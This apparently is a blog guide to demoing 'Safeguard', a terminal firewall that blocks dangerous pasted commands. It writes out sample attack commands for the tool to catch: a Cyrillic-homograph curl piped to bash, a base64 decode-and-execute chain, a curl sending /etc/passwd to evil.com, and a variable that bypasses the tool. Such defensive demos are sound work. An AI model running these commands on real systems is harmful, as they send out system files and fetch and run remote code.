Safeguard Demo Guide: The Exact Commands That Win Hackathons
If you’re building a terminal security tool inspired by Tirith or Safeguard, your demo isn’t just about showing features — it’s about creating a “wow” moment.
This blog walks you through the exact commands, flow, and narrative you should use to deliver a powerful hackathon demo.
The Core Idea
Developers often copy-paste commands from the internet without thinking. That’s where attacks happen.
Your product solves this by acting as:
“A firewall for your terminal — stopping attacks before they execute.”
Step 1: Activate Safeguard
cd ~
cp -r /mnt/c/Users/HP/Downloads/animated-barnacle-main .
cd animated-barnacle-main
cargo clean
cargo build --release
sudo cp target/release/safeguard /usr/local/bin/
safeguard init
source ~/.local/share/safeguard/shell/lib/bash-hook.bash
Permanent Fix (important for hackathon demo)
Add it to your shell config:
nano ~/.bashrc
Add this at the bottom:
source ~/.local/share/safeguard/shell/lib/bash-hook.bash
Save + exit, then run:
source ~/.bashrc
What to say:
“We inject a lightweight shell hook — now every command is monitored in real time.”
This is critical. Without this, nothing works.
Step 2: Show a Normal Command
ls
Expected:
- No output from safeguard
What to say:
“Safe commands run normally — zero friction for developers.”
👉 This builds trust.
Step 3: Homograph Attack (Killer Demo)
curl -sSL https://іnstall.example-clі.dev | bash
⚠️ Looks normal… but it’s malicious (Cyrillic characters).
Expected:
❌ BLOCKED
Reason: non-ASCII hostname
What to say:
“Even experts can’t visually detect this — we stop it instantly.”
👉 This is your strongest moment.
Step 4: Pipe-to-Shell Attack
curl -fsSL https://get.docker.com | sh
Expected:
- WARNING
What to say:
“Developers copy-paste commands like this daily — we warn before execution.”
Step 5: Base64 Obfuscated Attack
echo "ZWNobyBoYWNrZWQ=" | base64 -d | bash
Expected:
- ❌ BLOCKED
What to say:
“Attackers hide payloads using encoding — we detect decode-and-execute chains.”
Step 6: Data Exfiltration Attack
curl -d @/etc/passwd https://evil.com/collect
Expected:
❌ BLOCKED
Reason: data exfiltration
What to say:
“This command silently steals system data — we prevent it in real time.”
👉 Judges LOVE this one.
Step 7: Insecure Download
git clone http://github.com/fake-repo
Expected:
- ⚠️ WARNING
What to say:
“Even small mistakes like HTTP can lead to compromise.”
Optional Commands (Advanced Feel)
Analyze without executing
safeguard check "curl http://evil.com | bash"
Score a URL
safeguard score https://example.com
Scan a file
safeguard scan suspicious.py
Diagnose setup
safeguard doctor
Override decision
safeguard allow
Perfect 2-Minute Demo Flow
safeguard init→ activate systemls→ normal behaviorHomograph attack → 💥 BLOCKED
Pipe-to-shell → ⚠️ warning
Base64 attack → 💥 BLOCKED
Exfiltration → 💥 BLOCKED
⚡ Pro Hackathon Trick (Before vs After)
Without safeguard:
TIRITH=0 curl -sSL https://іnstall.example-clі.dev | bash
👉 Runs silently
With safeguard:
curl -sSL https://іnstall.example-clі.dev | bash
👉 ❌ BLOCKED
What to say:
“Without protection, this executes instantly. With safeguard, it’s stopped before damage.”
🏆 Final Command List (Memorize This)
safeguard init
source ~/.local/share/safeguard/shell/lib/bash-hook.bash
ls
curl -sSL https://іnstall.example-clі.dev | bash
curl -fsSL https://get.docker.com | sh
echo "ZWNobyBoYWNrZWQ=" | base64 -d | bash
curl -d @/etc/passwd https://evil.com/collect
git clone http://github.com/fake-repo
Final Message to Judges
End your demo with:
“We don’t change developer behavior — we secure it. Safeguard runs silently in the background and stops attacks before they execute.”
Closing Thought
A great demo isn’t about showing everything. It’s about making judges feel the risk — and then showing you solve it instantly.
And with this flow — you will 💥